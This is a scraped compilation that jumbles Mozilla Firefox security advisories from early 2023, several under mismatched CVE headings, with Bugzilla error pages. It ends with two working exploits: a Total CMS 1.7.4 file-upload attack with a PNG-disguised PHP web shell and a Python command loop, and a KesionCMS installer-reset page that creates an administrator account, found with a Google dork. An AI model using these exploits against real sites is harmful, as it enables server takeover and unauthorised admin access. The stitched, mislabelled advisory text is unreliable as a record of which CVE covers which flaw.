Mozilla developers and community members Calixte Denizet, Gabriele Svelto, Andrew McCreight, and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 110. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 111.

Thu Jun 8 2023 21:13:45 PDT  

*   **Bug ID:** 1803109, 1808832, 1809542, 1817336?cve=title

**Zarro Boogs found.**

We couldn't find any bugs matching your search terms. You could try searching with fewer or different terms.

*   File a new bug
*   Edit this search
*   Start a new search

  

REST | CSV | Feed | iCalendar

Edit Search

 

as

CVE-2023-28177: Bug List

If temporary "one-time" permissions, such as the ability to use the Camera, were granted to a document loaded using a file: URL, that permission persisted in that tab for all other documents loaded from a file: URL. This is potentially dangerous if the local files came from different sources, such as in a download directory. This vulnerability affects Firefox < 111.

Sorry, I can't find "_1811181?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-28161: Invalid Bug ID

By displaying a prompt with a long description, the fullscreen notification could have been hidden, resulting in potential user confusion or spoofing attacks. <br>*This bug only affects Firefox for Android. Other operating systems are unaffected.*. This vulnerability affects Firefox < 111.

**Mozilla Foundation Security Advisory 2023-09**

Announced

March 14, 2023

Impact

high

Products

Firefox

Fixed in

*   Firefox 111

**#CVE-2023-28159: Fullscreen Notification could have been hidden by download popups on Android**

Reporter

Axel Chong (@Haxatron)

Impact

high

**Description**

The fullscreen notification could have been hidden on Firefox for Android by using download popups, resulting in potential user confusion or spoofing attacks.  
_This bug only affects Firefox for Android. Other operating systems are unaffected._

**References**

*   Bug 1783561

**#CVE-2023-25748: Fullscreen Notification could have been hidden by window prompts on Android**

Reporter

Hafiizh

Impact

high

**Description**

By displaying a prompt with a long description, the fullscreen notification could have been hidden, resulting in potential user confusion or spoofing attacks.  
_This bug only affects Firefox for Android. Other operating systems are unaffected._

**References**

*   Bug 1798798

**#CVE-2023-25749: Firefox for Android may have opened third-party apps without a prompt**

Reporter

Kirtikumar Anandrao Ramchandani

Impact

high

**Description**

Android applications with unpatched vulnerabilities can be launched from a browser using Intents, exposing users to these vulnerabilities. Firefox will now confirm with users that they want to launch an external application before doing so.  
_This bug only affects Firefox for Android. Other versions of Firefox are unaffected._

**References**

*   Bug 1810705

**#CVE-2023-25750: Potential ServiceWorker cache leak during private browsing mode**

Reporter

Kagami Rosylight

Impact

high

**Description**

Under certain circumstances, a ServiceWorker's offline cache may have leaked to the file system when using private browsing mode.

**References**

*   Bug 1814733

**#CVE-2023-25751: Incorrect code generation during JIT compilation**

Reporter

Lukas Bernhard

Impact

high

**Description**

Sometimes, when invalidating JIT code while following an iterator, the newly generated code could be overwritten incorrectly. This could lead to a potentially exploitable crash.

**References**

*   Bug 1814899

**#CVE-2023-28160: Redirect to Web Extension files may have leaked local path**

Reporter

Rob Wu

Impact

moderate

**Description**

When following a redirect to a publicly accessible web extension file, the URL may have been translated to the actual local path, leaking potentially sensitive information.

**References**

*   Bug 1802385

**#CVE-2023-28164: URL being dragged from a removed cross-origin iframe into the same tab triggered navigation**

Reporter

Luan Herrera

Impact

moderate

**Description**

Dragging a URL from a cross-origin iframe that was removed during the drag could have led to user confusion and website spoofing attacks.

**References**

*   Bug 1809122

**#CVE-2023-28161: One-time permissions granted to a local file were extended to other local files loaded in the same tab**

Reporter

Khiem Tran

Impact

moderate

**Description**

If temporary "one-time" permissions, such as the ability to use the Camera, were granted to a document loaded using a file: URL, that permission persisted in that tab for all other documents loaded from a file: URL. This is potentially dangerous if the local files came from different sources, such as in a download directory.

**References**

*   Bug 1811181

**#CVE-2023-28162: Invalid downcast in Worklets**

Reporter

Lukas Bernhard

Impact

moderate

**Description**

While implementing AudioWorklets, some code may have casted one type to another, invalid, dynamic type. This could have led to a potentially exploitable crash.

**References**

*   Bug 1811327

**#CVE-2023-25752: Potential out-of-bounds when accessing throttled streams**

Reporter

Ronald Crane

Impact

moderate

**Description**

When accessing throttled streams, the count of available bytes needed to be checked in the calling function to be within bounds. This may have lead future code to be incorrect and vulnerable.

**References**

*   Bug 1811627

**#CVE-2023-28163: Windows Save As dialog resolved environment variables**

Reporter

Shaheen Fazim

Impact

moderate

**Description**

When downloading files through the Save As dialog on Windows with suggested filenames containing environment variable names, Windows would have resolved those in the context of the current user.  
_This bug only affects Firefox on Windows. Other versions of Firefox are unaffected._

**References**

*   Bug 1817768

**#CVE-2023-28176: Memory safety bugs fixed in Firefox 111 and Firefox ESR 102.9**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers Timothy Nikkel, Andrew McCreight, and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 110 and Firefox ESR 102.8. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 111 and Firefox ESR 102.9

**#CVE-2023-28177: Memory safety bugs fixed in Firefox 111**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers and community members Calixte Denizet, Gabriele Svelto, Andrew McCreight, and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 110. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 111

CVE-2023-25748: Security Vulnerabilities fixed in Firefox 111

Mozilla developers Randell Jesup, Andrew Osmond, Sebastian Hengst, Andrew McCreight, and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 111 and Firefox ESR 102.9. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 112, Focus for Android < 112, Firefox ESR < 102.10, Firefox for Android < 112, and Thunderbird < 102.10.

**Mozilla Foundation Security Advisory 2023-14**

Announced

April 11, 2023

Impact

high

Products

Firefox ESR

Fixed in

*   Firefox ESR 102.10

**#CVE-2023-29531: Out-of-bound memory access in WebGL on macOS**

Reporter

DoHyun Lee

Impact

high

**Description**

An attacker could have caused an out of bounds memory access using WebGL APIs, leading to memory corruption and a potentially exploitable crash.  
_This bug only affects Firefox for macOS. Other operating systems are unaffected._

**References**

*   Bug 1794292

**#CVE-2023-29532: Mozilla Maintenance Service Write-lock bypass**

Reporter

Holger Fuhrmannek

Impact

high

**Description**

A local attacker can trick the Mozilla Maintenance Service into applying an unsigned update file by pointing the service at an update file on a malicious SMB server. The update file can be replaced after the signature check, before the use, because the write-lock requested by the service does not work on a SMB server.  
_Note: This attack requires local system access and only affects Windows. Other operating systems are not affected._

**References**

*   Bug 1806394

**#CVE-2023-29533: Fullscreen notification obscured**

Reporter

Irvan Kurniawan

Impact

high

**Description**

A website could have obscured the fullscreen notification by using a combination of window.open, fullscreen requests, window.name assignments, and setInterval calls. This could have led to user confusion and possible spoofing attacks.

**References**

*   Bug 1814597
*   Bug 1798219

**#CVE-2023-1999: Double-free in libwebp**

Reporter

Irvan Kurniawan

Impact

high

**Description**

A double-free in libwebp could have led to memory corruption and a potentially exploitable crash.

**References**

*   Bug 1819244

**#CVE-2023-29535: Potential Memory Corruption following Garbage Collector compaction**

Reporter

Lukas Bernhard

Impact

high

**Description**

Following a Garbage Collector compaction, weak maps may have been accessed before they were correctly traced. This resulted in memory corruption and a potentially exploitable crash.

**References**

*   Bug 1820543

**#CVE-2023-29536: Invalid free from JavaScript code**

Reporter

zx from qriousec

Impact

high

**Description**

An attacker could cause the memory manager to incorrectly free a pointer that addresses attacker-controlled memory, resulting in an assertion, memory corruption, or a potentially exploitable crash.

**References**

*   Bug 1821959

**#CVE-2023-29539: Content-Disposition filename truncation leads to Reflected File Download**

Reporter

Trung Pham

Impact

moderate

**Description**

When handling the filename directive in the Content-Disposition header, the filename would be truncated if the filename contained a NULL character. This could have led to reflected file download attacks potentially tricking users to install malware.

**References**

*   Bug 1784348

**#CVE-2023-29541: Files with malicious extensions could have been downloaded unsafely on Linux**

Reporter

Ameen Basha M K

Impact

moderate

**Description**

Firefox did not properly handle downloads of files ending in .desktop, which can be interpreted to run attacker-controlled commands.  
_This bug only affects Firefox for Linux on certain Distributions. Other operating systems are unaffected, and Mozilla is unable to enumerate all affected Linux Distributions._

**References**

*   Bug 1810191

**#CVE-2023-29542: Bypass of file download extension restrictions**

Reporter

Shaheen Fazim and Ameen Basha M K

Impact

moderate

**Description**

A newline in a filename could have been used to bypass the file extension security mechanisms that replace malicious file extensions such as .lnk with .download. This could have led to accidental execution of malicious code.  
_This bug only affects Firefox on Windows. Other versions of Firefox are unaffected._

**References**

*   Bug 1815062
*   Bug 1810793

**#CVE-2023-29545: Windows Save As dialog resolved environment variables**

Reporter

Axel Chong (@Haxatron)

Impact

moderate

**Description**

Similar to CVE-2023-28163, this time when choosing 'Save Link As', suggested filenames containing environment variable names would have resolved those in the context of the current user.  
_This bug only affects Firefox on Windows. Other versions of Firefox are unaffected._

**References**

*   Bug 1823077

**#CVE-2023-1945: Memory Corruption in Safe Browsing Code**

Reporter

Gabriele Svelto

Impact

moderate

**Description**

Unexpected data returned from the Safe Browsing API could have led to memory corruption and a potentially exploitable crash.

**References**

*   Bug 1777588

**#CVE-2023-29548: Incorrect optimization result on ARM64**

Reporter

JunYoung Park

Impact

low

**Description**

A wrong lowering instruction in the ARM64 Ion compiler resulted in a wrong optimization result.

**References**

*   Bug 1822754

**#CVE-2023-29550: Memory safety bugs fixed in Firefox 112 and Firefox ESR 102.10**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers Andrew Osmond, Sebastian Hengst, Andrew McCreight, and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 111 and Firefox ESR 102.9. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 112 and Firefox ESR 102.10

CVE-2023-29550: Security Vulnerabilities fixed in Firefox ESR 102.10

Mozilla developers Randell Jesup, Andrew McCreight, Gabriele Svelto, and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 111. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox for Android < 112, Firefox < 112, and Focus for Android < 112.

**Mozilla Foundation Security Advisory 2023-13**

Announced

April 11, 2023

Impact

high

Products

Firefox, Firefox for Android, Focus for Android

Fixed in

*   Firefox 112
*   Firefox for Android 112
*   Focus for Android 112

**#CVE-2023-29531: Out-of-bound memory access in WebGL on macOS**

Reporter

DoHyun Lee

Impact

high

**Description**

An attacker could have caused an out of bounds memory access using WebGL APIs, leading to memory corruption and a potentially exploitable crash.  
_This bug only affects Firefox for macOS. Other operating systems are unaffected._

**References**

*   Bug 1794292

**#CVE-2023-29532: Mozilla Maintenance Service Write-lock bypass**

Reporter

Holger Fuhrmannek

Impact

high

**Description**

A local attacker can trick the Mozilla Maintenance Service into applying an unsigned update file by pointing the service at an update file on a malicious SMB server. The update file can be replaced after the signature check, before the use, because the write-lock requested by the service does not work on a SMB server.  
_Note: This attack requires local system access and only affects Windows. Other operating systems are not affected._

**References**

*   Bug 1806394

**#CVE-2023-29533: Fullscreen notification obscured**

Reporter

Irvan Kurniawan

Impact

high

**Description**

A website could have obscured the fullscreen notification by using a combination of window.open, fullscreen requests, window.name assignments, and setInterval calls. This could have led to user confusion and possible spoofing attacks.

**References**

*   Bug 1814597
*   Bug 1798219

**#CVE-2023-29534: Fullscreen notification could have been obscured on Firefox for Android**

Reporter

Shaheen Fazim and Hafiizh

Impact

high

**Description**

Different techniques existed to obscure the fullscreen notification in Firefox and Focus for Android. These could have led to potential user confusion and spoofing attacks.  
_This bug only affects Firefox and Focus for Android. Other versions of Firefox are unaffected._

**References**

*   Bug 1816059
*   Bug 1816007
*   Bug 1821155
*   Bug 1821576
*   Bug 1821906
*   Bug 1822298
*   Bug 1822305

**#CVE-2023-1999: Double-free in libwebp**

Reporter

Irvan Kurniawan

Impact

high

**Description**

A double-free in libwebp could have led to memory corruption and a potentially exploitable crash.

**References**

*   Bug 1819244

**#CVE-2023-29535: Potential Memory Corruption following Garbage Collector compaction**

Reporter

Lukas Bernhard

Impact

high

**Description**

Following a Garbage Collector compaction, weak maps may have been accessed before they were correctly traced. This resulted in memory corruption and a potentially exploitable crash.

**References**

*   Bug 1820543

**#CVE-2023-29536: Invalid free from JavaScript code**

Reporter

zx from qriousec

Impact

high

**Description**

An attacker could cause the memory manager to incorrectly free a pointer that addresses attacker-controlled memory, resulting in an assertion, memory corruption, or a potentially exploitable crash.

**References**

*   Bug 1821959

**#CVE-2023-29537: Data Races in font initialization code**

Reporter

Looben Yang

Impact

high

**Description**

Multiple race conditions in the font initialization could have led to memory corruption and execution of attacker-controlled code.

**References**

*   Bug 1823365
*   Bug 1824200
*   Bug 1825569

**#CVE-2023-29538: Directory information could have been leaked to WebExtensions**

Reporter

Alexis aka zoracon

Impact

moderate

**Description**

Under specific circumstances a WebExtension may have received a jar:file:/// URI instead of a moz-extension:/// URI during a load request. This leaked directory paths on the user's machine.

**References**

*   Bug 1685403

**#CVE-2023-29539: Content-Disposition filename truncation leads to Reflected File Download**

Reporter

Trung Pham

Impact

moderate

**Description**

When handling the filename directive in the Content-Disposition header, the filename would be truncated if the filename contained a NULL character. This could have led to reflected file download attacks potentially tricking users to install malware.

**References**

*   Bug 1784348

**#CVE-2023-29540: Iframe sandbox bypass using redirects and sourceMappingUrls**

Reporter

Axel Chong (@Haxatron)

Impact

moderate

**Description**

Using a redirect embedded into sourceMappingUrls could allow for navigation to external protocol links in sandboxed iframes without allow-top-navigation-to-custom-protocols.

**References**

*   Bug 1790542

**#CVE-2023-29541: Files with malicious extensions could have been downloaded unsafely on Linux**

Reporter

Ameen Basha M K

Impact

moderate

**Description**

Firefox did not properly handle downloads of files ending in .desktop, which can be interpreted to run attacker-controlled commands.  
_This bug only affects Firefox for Linux on certain Distributions. Other operating systems are unaffected, and Mozilla is unable to enumerate all affected Linux Distributions._

**References**

*   Bug 1810191

**#CVE-2023-29542: Bypass of file download extension restrictions**

Reporter

Shaheen Fazim and Ameen Basha M K

Impact

moderate

**Description**

A newline in a filename could have been used to bypass the file extension security mechanisms that replace malicious file extensions such as .lnk with .download. This could have led to accidental execution of malicious code.  
_This bug only affects Firefox on Windows. Other versions of Firefox are unaffected._

**References**

*   Bug 1815062
*   Bug 1810793

**#CVE-2023-29543: Use-after-free in debugging APIs**

Reporter

Lukas Bernhard

Impact

moderate

**Description**

An attacker could have caused memory corruption and a potentially exploitable use-after-free of a pointer in a global object's debugger vector.

**References**

*   Bug 1816158

**#CVE-2023-29544: Memory Corruption in garbage collector**

Reporter

Lukas Bernhard

Impact

moderate

**Description**

If multiple instances of resource exhaustion occurred at the incorrect time, the garbage collector could have caused memory corruption and a potentially exploitable crash.

**References**

*   Bug 1818781

**#CVE-2023-29545: Windows Save As dialog resolved environment variables**

Reporter

Axel Chong (@Haxatron)

Impact

moderate

**Description**

Similar to CVE-2023-28163, this time when choosing 'Save Link As', suggested filenames containing environment variable names would have resolved those in the context of the current user.  
_This bug only affects Firefox on Windows. Other versions of Firefox are unaffected._

**References**

*   Bug 1823077

**#CVE-2023-29546: Screen recording in Private Browsing included address bar on Android**

Reporter

Irwan

Impact

low

**Description**

When recording the screen while in Private Browsing on Firefox for Android the address bar and keyboard were not hidden, potentially leaking sensitive information.  
_This bug only affects Firefox for Android. Other operating systems are unaffected._

**References**

*   Bug 1780842

**#CVE-2023-29547: Secure document cookie could be spoofed with insecure cookie**

Reporter

Marco Squarcina

Impact

low

**Description**

When a secure cookie existed in the Firefox cookie jar an insecure cookie for the same domain could have been created, when it should have silently failed. This could have led to a desynchronization in expected results when reading from the secure cookie.

**References**

*   Bug 1783536

**#CVE-2023-29548: Incorrect optimization result on ARM64**

Reporter

JunYoung Park

Impact

low

**Description**

A wrong lowering instruction in the ARM64 Ion compiler resulted in a wrong optimization result.

**References**

*   Bug 1822754

**#CVE-2023-29549: Javascript's bind function may have failed**

Reporter

Lukas Bernhard

Impact

low

**Description**

Under certain circumstances, a call to the bind function may have resulted in the incorrect realm. This may have created a vulnerability relating to JavaScript-implemented sandboxes such as SES.

**References**

*   Bug 1823042

**#CVE-2023-29550: Memory safety bugs fixed in Firefox 112 and Firefox ESR 102.10**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers Randell Jesup, Andrew Osmond, Sebastian Hengst, Andrew McCreight, and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 111 and Firefox ESR 102.9. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 112 and Firefox ESR 102.10

**#CVE-2023-29551: Memory safety bugs fixed in Firefox 112**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers Randell Jesup, Andrew McCreight, Gabriele Svelto, and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 111. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 112

CVE-2023-29551: Security Vulnerabilities fixed in Firefox 112, Firefox for Android 112, Focus for Android 112

When encoding data from an <code>inputStream</code> in <code>xpcom</code> the size of the input being encoded was not correctly calculated potentially leading to an out of bounds memory write. This vulnerability affects Firefox < 110, Thunderbird < 102.8, and Firefox ESR < 102.8.

**Mozilla Foundation Security Advisory 2023-05**

Announced

February 14, 2023

Impact

high

Products

Firefox

Fixed in

*   Firefox 110

**#CVE-2023-25728: Content security policy leak in violation reports using iframes**

Reporter

Johan Carlsson

Impact

high

**Description**

The Content-Security-Policy-Report-Only header could allow an attacker to leak a child iframe's unredacted URI when interaction with that iframe triggers a redirect.

**References**

*   Bug 1790345

**#CVE-2023-25730: Screen hijack via browser fullscreen mode**

Reporter

Irvan Kurniawan

Impact

high

**Description**

A background script invoking requestFullscreen and then blocking the main thread could force the browser into fullscreen mode indefinitely, resulting in potential user confusion or spoofing attacks.

**References**

*   Bug 1794622

**#CVE-2023-25743: Fullscreen notification not shown in Firefox Focus**

Reporter

Hafiizh

Impact

high

**Description**

A lack of in app notification for entering fullscreen mode could have lead to a malicious website spoofing browser chrome.  
_This bug only affects Firefox Focus. Other versions of Firefox are unaffected._

**References**

*   Bug 1800203

**#CVE-2023-0767: Arbitrary memory write via PKCS 12 in NSS**

Reporter

Christian Holler

Impact

high

**Description**

An attacker could construct a PKCS 12 cert bundle in such a way that could allow for arbitrary memory writes via PKCS 12 Safe Bag attributes being mishandled.

**References**

*   Bug 1804640

**#CVE-2023-25735: Potential use-after-free from compartment mismatch in SpiderMonkey**

Reporter

Samuel Groß

Impact

high

**Description**

Cross-compartment wrappers wrapping a scripted proxy could have caused objects from other compartments to be stored in the main compartment resulting in a use-after-free after unwrapping the proxy.

**References**

*   Bug 1810711

**#CVE-2023-25737: Invalid downcast in SVGUtils::SetupStrokeGeometry**

Reporter

Lukas Bernhard

Impact

high

**Description**

An invalid downcast from nsTextNode to SVGElement could have lead to undefined behavior.

**References**

*   Bug 1811464

**#CVE-2023-25738: Printing on Windows could potentially crash Firefox with some device drivers**

Reporter

Mark

Impact

high

**Description**

Members of the DEVMODEW struct set by the printer device driver weren't being validated and could have resulted in invalid values which in turn would cause the browser to attempt out of bounds access to related variables.  
_This bug only affects Firefox on Windows. Other operating systems are unaffected._

**References**

*   Bug 1811852

**#CVE-2023-25739: Use-after-free in mozilla::dom::ScriptLoadContext::~ScriptLoadContext**

Reporter

Holger Fuhrmannek

Impact

high

**Description**

Module load requests that failed were not being checked as to whether or not they were cancelled causing a use-after-free in ScriptLoadContext.

**References**

*   Bug 1811939

**#CVE-2023-25729: Extensions could have opened external schemes without user knowledge**

Reporter

Vitor Torres

Impact

moderate

**Description**

Permission prompts for opening external schemes were only shown for ContentPrincipals resulting in extensions being able to open them without user interaction via ExpandedPrincipals. This could lead to further malicious actions such as downloading files or interacting with software already installed on the system.

**References**

*   Bug 1792138

**#CVE-2023-25732: Out of bounds memory write from EncodeInputStream**

Reporter

Ronald Crane

Impact

moderate

**Description**

When encoding data from an inputStream in xpcom the size of the input being encoded was not correctly calculated potentially leading to an out of bounds memory write.

**References**

*   Bug 1804564

**#CVE-2023-25734: Opening local .url files could cause unexpected network loads**

Reporter

Ameen Basha M K and Shaheen Fazim

Impact

moderate

**Description**

After downloading a Windows .url shortcut from the local filesystem, an attacker could supply a remote path that would lead to unexpected network requests from the operating system. This also had the potential to leak NTLM credentials to the resource.  
_This bug only affects Firefox on Windows. Other operating systems are unaffected._

**References**

*   Bug 1809923
*   Bug 1784451
*   Bug 1810143
*   Bug 1812338

**#CVE-2023-25740: Opening local .scf files could cause unexpected network loads**

Reporter

Axel Chong (@Haxatron)

Impact

moderate

**Description**

After downloading a Windows .scf script from the local filesystem, an attacker could supply a remote path that would lead to unexpected network requests from the operating system. This also had the potential to leak NTLM credentials to the resource.  
_This bug only affects Firefox for Windows. Other operating systems are unaffected._

**References**

*   Bug 1812354

**#CVE-2023-25731: Prototype pollution when rendering URLPreview**

Reporter

pyakovlev & Alexander Volkov

Impact

low

**Description**

Due to URL previews in the network panel of developer tools improperly storing URLs, query parameters could potentially be used to overwrite global objects in privileged code.

**References**

*   Bug 1801542

**#CVE-2023-25733: Possible null pointer dereference in TaskbarPreviewCallback**

Reporter

Ronald Crane

Impact

low

**Description**

The return value from gfx::SourceSurfaceSkia::Map() wasn't being verified which could have potentially lead to a null pointer dereference.

**References**

*   Bug 1808632

**#CVE-2023-25736: Invalid downcast in GetTableSelectionMode**

Reporter

Lukas Bernhard

Impact

low

**Description**

An invalid downcast from nsHTMLDocument to nsIContent could have lead to undefined behavior.

**References**

*   Bug 1811331

**#CVE-2023-25741: Same-origin policy leak via image drag and drop**

Reporter

Dohyun Lee (@l33d0hyun) of SSD Labs

Impact

low

**Description**

When dragging and dropping an image cross-origin, the image's size could potentially be leaked. This behavior was shipped in 109 and caused web compatibility problems as well as this security concern, so the behavior was disabled until further review.

**References**

*   Bug 1813376
*   Bug 1437126
*   Bug 1812611

**#CVE-2023-25742: Web Crypto ImportKey crashes tab**

Reporter

Goras Francesco

Impact

low

**Description**

When importing a SPKI RSA public key as ECDSA P-256, the key would be handled incorrectly causing the tab to crash.

**References**

*   Bug 1813424

**#CVE-2023-25744: Memory safety bugs fixed in Firefox 110 and Firefox ESR 102.8**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers Kershaw Chang and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 109 and Firefox ESR 102.7. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 110 and Firefox ESR 102.8

**#CVE-2023-25745: Memory safety bugs fixed in Firefox 110**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers Timothy Nikkel, Gabriele Svelto, Jeff Muizelaar and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 109. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 110

CVE-2023-25732: Security Vulnerabilities fixed in Firefox 110

Total CMS version 1.7.4 suffers from a remote shell upload vulnerability.

    # Exploit Title: Total CMS 1.7.4 - Remote Code Execution (RCE) on File Upload (Authenticated) # Date: 03/06/2023# Exploit Author: tmrswrr# Version: 1.7.4# Vendor home page : https://www.totalcms.co/# Tested Url : https://www.totalcms.co/demo/soccer/#PLatform : MACOSX1) Go to this page and click edit page buttonhttps://localhost/demo/soccer/2)After go down and will you see downloads area 3)Add in this area shell.php file?PNG...<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>"  ?>IEND4) After open this file and write commandshttps://localhosts/cms-data/depot/cmssoccerdepot/shell.php?cmd=idResult :?PNG ...uid=996(caddy) gid=998(caddy) groups=998(caddy),33(www-data)IEND Exploit: import requestsurl = input("Enter the URL: ")urll = url + "/rw_common/plugins/stacks/total-cms/totalapi.php"headers = {    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',    'Accept': 'application/json',    'Accept-Language': 'en-US,en;q=0.5',    'Accept-Encoding': 'gzip, deflate',    'Cache-Control': 'no-cache',    'X-Requested-With': 'XMLHttpRequest',    'Total-Key': '3c79a3226d86c825bc0c4cb0cca05b17',    'Content-Type': 'multipart/form-data; boundary=---------------------------17104855723143716151436432930',    'Origin': urll,    'Dnt': '1',    'Referer': f'{urll}/demo/soccer/admin/',    'Sec-Fetch-Dest': 'empty',    'Sec-Fetch-Mode': 'cors',    'Sec-Fetch-Site': 'same-origin',    'Te': 'trailers',    'Connection': 'close'}data = '''\-----------------------------17104855723143716151436432930\r\nContent-Disposition: form-data; name="slug"\r\n\r\ncmssoccerdepot\r\n-----------------------------17104855723143716151436432930\r\nContent-Disposition: form-data; name="type"\r\n\r\ndepot\r\n-----------------------------17104855723143716151436432930\r\nContent-Disposition: form-data; name="file"; filename="hey.php"\r\nContent-Type: application/x-php\r\n\r\n?PNG...<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>"  ?>IEND\r\n\r\n-----------------------------17104855723143716151436432930--'''while True:    command = input("WRITE YOUR COMMAND ('exit' to quit): ")    if command.lower() == "exit":        break    response = requests.post(url, headers=headers, data=data)    if response.status_code == 200:        shell_path = f'/cms-data/depot/cmssoccerdepot/hey.php?cmd={command}'        shell_url = url + shell_path        print(shell_url)        shell_response = requests.get(shell_url)        print(shell_response.text)    else:        print('Failed to execute the request.')

Total CMS 1.7.4 Shell Upload

KesionCMS ASP version 9.5 suffers from an add administrator vulnerability.

====================================================================================================================================  
| # Title     : KesionCMS ASP v9.5 Reinstall Add Admin Exploit                                                                     |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 105.0.(32-bit)                                             |   
| # Vendor    : https://www.kesion.com/                                                                                            |    
| # Dork      : Powered by KesionCMS                                                                                               |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] copy & past this exploit listed below into a text file and save it with ".html" extension

[+] at Line 09 & 16 change the domain name of target .

[+] The infected folder is /install/  
    This is due to direct unauthorized access to the fourth stage (?action=s4)of the script installation  
    The fourth stage (?action=s4)is responsible for configuring the setting of the site administrator.   
  For this, the vulnerability can be exploited through the direct link or using the exploitation written below

[+] Exploit

    <head><title>  
            Hacked By indoushka  
        </title><link href="http://www.tzxdcpv.com/install/images/guide.css" rel="stylesheet" />  
        <script src="http://www.tzxdcpv.com/ks_inc/jquery.js" type="text/javascript"></script>  
    <script src="http://www.tzxdcpv.com/ks_inc/common.js" type="text/javascript"></script>  
    <script src="http://www.tzxdcpv.com/ks_inc/lhgdialog.js"></script>  
        </head>  
        <body>    
 <form name="form" method="post" action="http://www.target.127.0.0.1/install/index.asp" id="form">  
        <div class="guide">  
         <div class="guidetitle">  
                </div>  
                <div class="clear"></div>  
              </div>  
          <div class="clear"></div>  
 <input type="hidden" name="action" value="http://www.target.127.0.0.1/install/?action=s5"  />  
       <input type="hidden" name="DBlx" value=""  />  
       <input type="hidden" name="CkbData" value=""  />

              <input type="hidden" name="TxtDBName_a" value=""  />  
       <input name="TxtDBService" value="" id="TxtDBService" class="text" type="hidden"  />  
       <input name="TxtDBName" value="" id="TxtDBName" class="text" type="hidden" />  
       <input name="TxtDBUser" value="" id="TxtDBUser" class="text" type="hidden" />  
       <input name="TxtDBPass" value="" id="TxtDBPass" class="text" type="hidden"  />

      <div id="http://www.target.127.0.0.1/install/?action=s4">

           </div>  
     <div class="clear"></div>  
     <div class="sjlist">  
      <h5>网站参数配置</h5>  
      <ul>  
        <li><span>网站名称：</span><input name="TxtSiteName" value="科兴网络开发" id="TxtSiteName" class="text" type="text"><font color="red">*</font> 如：Kesion官方站</li>  
        <li><span>网站域名：</span><input name="TxtSiteUrl" value="http://cxsecurity.com" id="TxtSiteUrl" class="text" type="text"><font color="red">*</font> 后面不要带“/”。   
        如http://www.kesion.com。  
        </li>  
        <li><span>安装目录：</span><input name="TxtInstallDir" value="/" id="TxtInstallDir" class="text" type="text"><font color="red">*</font> 后面不要带“/”。   
        系统会自动获取，建议不要修改。  
        </li>  
        <li><span>授 权 码：</span><input name="TxtSiteKey" value="0" id="TxtSiteKey" class="text" type="text">  
        免费版本用户请留空或填“0”。  
        </li>  
        <li><span>后台目录：</span><input name="TxtManageDir" value="Admin/" id="TxtManageDir" class="text" type="text"><font color="red">*</font> 如：Manage,Admin，后面必须带"/"符号。</li>  
                <li><span> 后台登录验证码：</span>  
                 <input type="radio" name="isCode_a" value="True"  /> 启用    
                 <input type="radio" value="False"  name="isCode_a" checked="checked"/> 不启用  
                </li>

                       <li><span>管理认证码：</span>  
                 <input type="radio" name="isCode" value="True" onclick="$('#rzm').show()"/> 启用  <input onclick="$('#rzm').hide()" type="radio" value="False"  name="isCode" checked="checked"   /> 不启用   
                <font id="rzm" style="display:none">认证码：<input name="TxtManageCode" value="8888"  id="TxtManageCode" class="text" style="width:100px;" type="text"></font></li>  
      </ul>  
      <div class="clear"></div>  
      <h5>填写管理员信息</h5>  
      <ul>  
        <li><span>管理员账号：</span><input name="TxtUserName" value="admin"  id="TxtUserName" class="text" type="text"><font color="red">*</font> </li>  
        <li><span>管理员密码：</span><input name="TxtUserPass" value="admin888" id="TxtUserPass" class="text" type="text"><font color="red">*</font> 管理员密码不能为空</li>  
        <li><span>重复密码：</span><input name="TxtReUserPass" value="admin888" id="TxtReUserPass" class="text" type="text"></li>  
      </ul>  
      <div class="clear blank10"></div>

            <div style="padding:5px">  
      <input name="Button1" value="下一步" onClick="return(doCheck());" id="Button1" class="btnbg" type="submit">  
      </div>  
    </div>

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
